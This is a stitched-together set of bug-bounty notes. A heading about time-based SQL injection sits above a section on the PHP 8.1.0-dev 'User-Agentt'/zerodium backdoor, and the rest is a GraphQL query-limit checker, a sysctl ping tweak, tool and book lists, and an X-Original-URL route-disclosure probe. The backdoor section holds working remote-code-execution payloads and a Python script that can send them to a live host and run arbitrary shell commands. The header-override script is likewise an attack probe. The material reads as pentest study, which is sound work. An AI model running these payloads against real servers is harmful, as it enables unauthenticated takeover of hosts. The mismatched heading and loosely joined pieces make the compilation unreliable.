SQLi Time-Based Blind Finding Methods: https://medium.com/@erkankavas/sqli-time-based-blind-finding-methods-cdef02de2d0e?source=rss------bug_bounty-5
PHP 8.1.0-dev RCE via User-Agentt Exploit
Introduction
In March 2021 the PHP project's own git server was compromised and two malicious commits were pushed to the master branch, at that time versioned 8.1.0-dev. They planted a backdoor in PHP's zlib extension: the patched C code looked up the unusual request header User-Agentt and, if its value began with the string zerodium, evaluated the rest of the value as PHP code. The commits were spotted and reverted within hours and never reached a tagged release, but builds of the compromised branch (including public lab images) still exist, and any server running one hands an unauthenticated attacker Remote Code Execution on every request, regardless of how the application itself handles headers.
How Does the Vulnerability Work?
PHP turns every request header into a $_SERVER entry by upper-casing it, replacing hyphens with underscores and prefixing HTTP_, so a User-Agentt header arrives as
$_SERVER['HTTP_USER_AGENTT']
The backdoored zlib extension read that entry itself and passed everything after the zerodium marker to the engine's eval routine. No application code was involved, so no input validation in the application could have prevented it. The snippet below is a PHP-level model of what the injected C code did, not the backdoor itself.
Example of Vulnerable PHP Code
<?php
// PHP-level model of the backdoor (the real one was C code in ext/zlib/zlib.c
// that evaluated whatever followed the "zerodium" marker). Deliberately vulnerable.
$user_agent = $_SERVER['HTTP_USER_AGENTT'] ?? '';   // the User-Agentt request header
if (str_starts_with($user_agent, 'zerodium')) {     // trigger string, 8 characters
    eval(substr($user_agent, 8));                   // everything after it runs as PHP
}
?>
Why is this dangerous?
Because any client can send a request whose User-Agentt header carries the zerodium marker followed by PHP code, and that code runs on the server with the privileges of the PHP worker (typically www-data), independently of which page was requested. No authentication, no particular URL and no bug in the application are needed.
How to Exploit the Vulnerability
1. Testing Delay with sleep()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsleep(5);
• The header value must begin with zerodium; everything after it is the PHP that gets evaluated. If this response arrives about 5 seconds later than an identical request without the header, the code is being evaluated. Measure a baseline first and repeat with a different delay (say 2 and then 7 seconds) so that network jitter is not mistaken for a hit.
2. Executing a System Command with system()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsystem('id');
• If the response body contains the output of id, such as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
• the RCE is confirmed and you also learn which account the web server runs as. If system() is blocked by disable_functions, an output-only payload such as zerodiumecho 'marker'; still proves that the header is evaluated.
3. Executing PHP via phpinfo()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumphpinfo();
• This dumps the PHP configuration (version, loaded extensions, disable_functions, open_basedir, filesystem paths), which tells you what the environment allows before you choose further payloads. The output is large, so fetch it once and save it.
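The three steps above as one script, written for this page as an added example (it is not code from the original post). The transport is a callable send(headers) -> (status, body, elapsed seconds) so the probing logic can run offline against the constructed simulation at the bottom, which only imitates the backdoor's trigger; for a real host wrap http_send() with the target's host, port and path. The output probe echoes a unique marker instead of system('id') so it does not depend on system() being enabled; run_command() is used afterwards to actually run a shell command and cut its output out of the page body.

```python
"""Probe a PHP 8.1.0-dev build for the User-Agentt / "zerodium" backdoor.

Added example, not code from the original post. Transport is a callable
send(headers) -> (status, body, elapsed_seconds) so the probing logic can run
offline against the constructed simulation at the bottom.
"""
import http.client
import re
import time

BACKDOOR_PREFIX = "zerodium"   # the backdoor fires only when the value starts with this
HEADER = "User-Agentt"         # PHP exposes it as $_SERVER['HTTP_USER_AGENTT']


def build_header(php_code):
    """Single request header that makes a backdoored build evaluate php_code."""
    return {HEADER: BACKDOOR_PREFIX + php_code}


def php_string(s):
    """Quote s as a PHP single-quoted literal (only backslash and ' need escaping)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def http_send(host, port, path, headers, timeout=20):
    """Real transport: one timed GET. Not exercised by the offline simulation."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    started = time.monotonic()
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, body, time.monotonic() - started


def probe(send, delay=3, marker="probe-7f3a9c"):
    """Baseline, then a timing probe with sleep() and an output probe with echo.
    'backdoored' is driven by the output probe, the stronger of the two."""
    _, base_body, base_t = send({})
    _, _, sleep_t = send(build_header(f"sleep({delay});"))
    time_hit = (sleep_t - base_t) >= delay * 0.8          # tolerate some jitter
    _, echo_body, _ = send(build_header(f"echo {php_string(marker)};"))
    echo_hit = marker in echo_body and marker not in base_body
    return {"time_based": time_hit, "output_based": echo_hit, "backdoored": echo_hit}


def run_command(send, cmd, tag="__cmd_out__"):
    """Run a shell command via system() and cut its output out of the page body."""
    payload = f"echo {php_string(tag)}; system({php_string(cmd)}); echo {php_string(tag)};"
    _, body, _ = send(build_header(payload))
    m = re.search(re.escape(tag) + r"(.*?)" + re.escape(tag), body, re.S)
    return m.group(1).strip() if m else None


# --- constructed simulation of a backdoored host (not real PHP) ---------------
_STMT = re.compile(r"\s*(?:sleep\((\d+)\)|echo '([^']*)'|system\('([^']*)'\));")
_FAKE_ID = "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"


def simulated_backdoored_server(headers):
    """Mimics the trigger: if User-Agentt starts with 'zerodium', 'evaluate' the
    rest, supporting only the three statement shapes the probes above send."""
    started = time.monotonic()
    out, ua = "", headers.get(HEADER, "")
    if ua.startswith(BACKDOOR_PREFIX):
        for m in _STMT.finditer(ua[len(BACKDOOR_PREFIX):]):
            if m.group(1):
                time.sleep(int(m.group(1)))
            elif m.group(2) is not None:
                out += m.group(2)
            elif m.group(3) == "id":
                out += _FAKE_ID
    return 200, out + "<html>hello</html>", time.monotonic() - started


def simulated_clean_server(headers):
    """A build without the backdoor: the header is ignored."""
    return 200, "<html>hello</html>", 0.0


if __name__ == "__main__":
    print(probe(simulated_backdoored_server, delay=1))
    print(run_command(simulated_backdoored_server, "id"))
    # real target (not run here):
    # import functools
    # real_send = functools.partial(http_send, "vulnerable.com", 80, "/index.php")
    # print(probe(real_send))
```

The timing threshold (80 percent of the requested delay, measured against a baseline taken in the same session) is what keeps a slow link from producing a false positive; the echo marker is random-looking so it cannot collide with page content.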
Conclusion
This backdoor gives an unauthenticated attacker direct command execution on any server built from the compromised branch, which means full compromise of that host. The lesson is about the software supply chain rather than application input handling: never run development builds of PHP in production, build only from signed release tarballs, and be able to audit what you deploy (a search of the source for zerodium or HTTP_USER_AGENTT finds this backdoor immediately). After the incident the PHP project abandoned its self-hosted git server and moved the canonical repository to GitHub. Keeping PHP up to date remains necessary, but an update only protects you when it comes from a trustworthy source.
📖 Windows Server 2025 Administration Fundamentals: A beginner's guide to managing and administering Windows Server environments, Fourth Edition
💠 Info : https://www.packtpub.com/en-us/product/windows-server-2025-administration-fundamentals-9781836205005
🔍 Link Gopher
🔍 Adblock Plus
🔍 FoxyProxy Standard
🔍 Video Speed Controller
🔍 Check XSS
🔍 HackTools
🔍 Bulk URL Opener
🔍 Temp Mail
🔍 JS Beautify CSS HTML
🔍 Multi-Account Containers
🌐 TruffleHog
🌐 Code Formatter
🌐 Freedium Extension
🌐 BuiltWith
🌐 Wappalyzer
🌐 WhatRuns
🌐 Retire.js
🌐 Cookie Extractor
🌐 Wayback Machine
🌐 EXIF Data Viewer
🌐 Shodan
🌐 S3 Bucket List
🌐 uBlock Origin
🌐 Resources Saver
🌐 Dot Git
🌐 EndPointer
addons.mozilla.org
Link Gopher – Get this Extension for 🦊 Firefox (en-US)
Download Link Gopher for Firefox. Extracts all links from web page, sorts them, removes duplicates, and displays them in a new tab for inspection or copy and paste into other systems.
GraphQL pentesting focuses on finding security weaknesses in applications that expose a GraphQL API. Unlike a REST endpoint with a fixed response, GraphQL lets the client shape the query, so authorization and resource limits have to be enforced per field and per resolver rather than per URL, and the gaps show up as improper authorization checks, excessive data exposure and insufficient input validation. Pentesters should look for introspection queries that reveal the full schema (including fields and mutations the UI never uses), aliases and batching that turn one request into hundreds of operations (rate-limit and brute-force bypass), and deeply nested or circular queries that exhaust the server (denial of service). Robust input validation, authorization checks inside every resolver, introspection disabled in production, and limits on query depth, aliases and overall complexity are the essential defences.
🔗 Hacktricks - GraphQL and Security
🔗 Five easy ways to hack GraphQL targets
🔗 Portswigger - Graphql
🔗 ApiSecurity
📱 PayloadsAllTheThings
📱 hacking graphql
📱 Awesome Graphql Security
📱 Hack-graphql
🖤 NahamCon2024: GraphQL is the New PHP
🖤 Finding Your Next Bug: GraphQL
🖤 GraphQL API Pentesting
📕 Black Hat GraphQL
📕 Hacking APIs - Breaking Web Application ...
📕 API Security in Action
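To make the "limit query complexity" and "introspection" points concrete, here is an added example (written for this page, not taken from any of the resources listed above) of the cheap pre-execution checks a GraphQL server can run on the raw query text: maximum nesting depth, alias count (the batching trick used to brute-force a login through one request) and use of __schema/__type. The scanner is hand-written and understands strings, block strings, comments, braces and parentheses; it is not a full GraphQL parser, so treat it as a filter in front of a real validation rule. The sample queries at the bottom are constructed.

```python
"""Query-shape guardrails for a GraphQL endpoint: nesting depth, alias count
and introspection use, measured on the raw query text before execution.

Added example, not code from any of the linked resources; a small scanner,
not a full GraphQL parser.
"""
import re

INTROSPECTION_FIELDS = {"__schema", "__type"}   # __typename is harmless and not included
_TOKEN = re.compile(r"[{}()]|[_A-Za-z][_0-9A-Za-z]*(\s*:)?")


def _blank_strings_and_comments(query):
    """Replace string literals and # comments with spaces so that braces
    inside them are not counted as selection sets."""
    out, i, n = [], 0, len(query)
    while i < n:
        if query.startswith('"""', i):                 # block string
            j = query.find('"""', i + 3)
            j = n if j == -1 else j + 3
        elif query[i] == '"':                          # ordinary string, honour escapes
            j = i + 1
            while j < n and query[j] != '"':
                j += 2 if query[j] == "\\" else 1
            j = min(j + 1, n)
        elif query[i] == "#":                          # comment to end of line
            j = query.find("\n", i)
            j = n if j == -1 else j
        else:
            out.append(query[i])
            i += 1
            continue
        out.append(" " * (j - i))
        i = j
    return "".join(out)


def analyze(query):
    """Return max nested selection-set depth, alias count and whether the query
    selects __schema/__type. Braces and colons inside argument lists (object
    literals, variables, directives) are ignored."""
    clean = _blank_strings_and_comments(query)
    depth = max_depth = paren = aliases = 0
    introspection = False
    for m in _TOKEN.finditer(clean):
        tok = m.group(0)
        if tok == "(":
            paren += 1
        elif tok == ")":
            paren = max(paren - 1, 0)
        elif paren:                                    # inside arguments: skip
            continue
        elif tok == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif tok == "}":
            depth = max(depth - 1, 0)
        else:
            if m.group(1):                             # name followed by ':' is an alias
                aliases += 1
            if tok in INTROSPECTION_FIELDS:
                introspection = True
    return {"depth": max_depth, "aliases": aliases, "introspection": introspection}


def check(query, max_depth=8, max_aliases=20, allow_introspection=False):
    """List of rule violations; an empty list means the query may proceed."""
    a = analyze(query)
    problems = []
    if a["depth"] > max_depth:
        problems.append(f"nesting depth {a['depth']} exceeds {max_depth}")
    if a["aliases"] > max_aliases:
        problems.append(f"{a['aliases']} aliases exceed {max_aliases} (batching/brute-force)")
    if a["introspection"] and not allow_introspection:
        problems.append("introspection (__schema/__type) is disabled")
    return problems


# Constructed sample queries.
BENIGN_QUERY = """
# comment with { braces } and "quotes"
query Issues($n: Int = 5) {
  issues(first: $n, filter: {state: "open { not a selection }"}) { title }
}
"""
DEEP_QUERY = "{ a { b { c { d { e { f } } } } } }"
ALIAS_BATCH = """
mutation {
  t1: login(user: "admin", password: "p1") { token }
  t2: login(user: "admin", password: "p2") { token }
  t3: login(user: "admin", password: "p3") { token }
}
"""
INTROSPECTION_QUERY = "{ __schema { types { name } } }"

if __name__ == "__main__":
    for name in ("BENIGN_QUERY", "DEEP_QUERY", "ALIAS_BATCH", "INTROSPECTION_QUERY"):
        q = globals()[name]
        print(name, analyze(q), check(q, max_depth=4, max_aliases=2))
```

Depth here counts selection sets, so a circular schema (user -> posts -> author -> posts ...) is caught by the depth limit even though every individual field is legitimate; the alias count is what stops a single request from carrying a whole password list.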
All these GitHub repositories contain 1000+ HackerOne reports to read, from which you can learn how bug bounty hunters did their recon to find IDOR vulnerabilities. I suggest reading at least 300 reports to get your own unique perspective on IDOR.
📕 Bug Bounty Bootcamp - By Vickie Li
Closing the server ping in the operating system layer (to increase security)
echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.conf
sysctl -p
To re-enable ping, set the value to 0 instead of 1 and run sysctl -p again (the command is lowercase; Sysctl will not be found). Append the line only once, or check the file first, since repeated appends leave duplicate entries; a file of your own under /etc/sysctl.d/ is the cleaner place for it. Note that this only stops the host from answering ICMP echo requests: it does not hide open TCP or UDP ports from a scanner, and it breaks any monitoring that relies on ping, so treat it as hygiene rather than a real control.
https://www.computerhope.com/
An interesting site with a lot of information about networking, security and technology, covering the subject from the early days of computing to the present.
Computer Hope
Free computer help and support, answering computer-related questions with complete information on hardware and software.
Someone wrote a script that audits a server's security configuration, so that newcomers do not have to discover the common server-configuration mistakes the hard way:
https://github.com/vernu/vps-audit
GitHub - vernu/vps-audit: lightweight, dependency-free bash script for security, performance auditing and infrastructure monitoring of Linux servers.
🔥 Always remember to test an API for the effect of additional headers.
X-Original-URL: /v1/api/endpoint_here
BOOM => Entire API routes disclosure.
Some front ends and frameworks honour X-Original-URL (and the similar X-Rewrite-URL) as the path to route, so the request is dispatched to the header's path instead of the request URL. An error or debug response for a path that does not exist can then list every route the API knows, and a path the front end blocks may become reachable through it.
Credit: @driccosec
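A systematic way to run this check, added here as an example (it is not the tip author's code): request a known-good path with each path-override header pointing somewhere else, compare every response against the baseline, and pull any route paths out of a verbose error body. The send(path, headers) -> (status, body) transport is injected, so the script runs offline against the constructed server at the bottom, which honours X-Original-URL the way a misconfigured front end / framework pair can; it is not a model of any specific product. For a real target pass a function that wraps your HTTP client.

```python
"""Detect path-override headers (X-Original-URL, X-Rewrite-URL) by diffing each
response against a baseline, then harvest route paths from a verbose error body.

Added example, not code from the tip above or its author.
"""
import hashlib
import re

OVERRIDE_HEADERS = ("X-Original-URL", "X-Rewrite-URL")


def fingerprint(status, body):
    """Cheap comparable summary of a response; any change is worth a look."""
    return status, len(body), hashlib.sha256(body.encode()).hexdigest()[:16]


def probe_overrides(send, public_path, target_path):
    """Request public_path with each override header pointing at target_path
    and report the headers that changed the response versus the baseline."""
    base = fingerprint(*send(public_path, {}))
    findings = {}
    for header in OVERRIDE_HEADERS:
        status, body = send(public_path, {header: target_path})
        if fingerprint(status, body) != base:
            findings[header] = {"status": status, "length": len(body), "body": body}
    return findings


def extract_routes(body, prefix="/v1/api"):
    """Heuristic: collect every path under prefix mentioned in a response body
    (verbose 404 or debug pages often print the router table)."""
    found = re.findall(re.escape(prefix) + r"[A-Za-z0-9_{}./-]*", body)
    return sorted(set(found))


# --- constructed server: honours X-Original-URL over the request URL ----------
ROUTES = ["/v1/api/login", "/v1/api/users/{id}", "/v1/api/admin/export"]


def simulated_server(path, headers):
    routed = headers.get("X-Original-URL", path)      # the header silently wins
    if routed == "/v1/api/login":
        return 200, '{"ok": true}'
    # a verbose 404 of the kind a debug-mode framework produces (constructed)
    return 404, "404 Not Found\nNo route matched. Known routes:\n" + "\n".join(ROUTES) + "\n"


if __name__ == "__main__":
    hits = probe_overrides(simulated_server, "/v1/api/login", "/v1/api/does-not-exist")
    for header, info in hits.items():
        print(header, info["status"], extract_routes(info["body"]))
```

Pointing the override at a path that cannot exist is deliberate: a changed status or body proves the header is being honoured, and an error page is the response most likely to leak the route table. Once a header is confirmed, repeat with paths the front end normally blocks (admin, export, internal).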
O'Reilly | Mastering Cybersecurity with Python: From Basics to Advanced, 2025
Info : https://www.oreilly.com/library/view/mastering-cybersecurity-with/9781837029273/